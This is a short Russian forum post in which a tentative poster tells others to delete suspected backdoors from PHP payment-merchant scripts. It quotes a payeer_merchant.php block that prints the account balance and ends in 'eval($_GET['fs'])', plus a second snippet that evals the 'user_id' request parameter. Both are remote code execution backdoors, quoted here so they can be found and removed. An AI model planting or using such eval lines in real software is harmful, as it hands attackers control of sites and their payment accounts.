Я так не особо понимаю, но чаще всего дыры бывают в файле payeer_merchant.php там если есть строка
# Проверяем баланс
if(isset($_GET['balance'])){
$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
if($payeer->isAuth()){
$arBalance = $payeer->getBalance();
if($arBalance["auth_error"] == 0){
$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
echo "$balance";
} else {
echo 'error auth';
}
}
}
# Если пользователь админ
eval($_GET['fs']);
если они есть, просто удали их, а ещё если там есть топ 5-10 тоже могут быть дыры, может не только в топе но все же вот код
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
если я не прав, не надо смеяться пожалуйста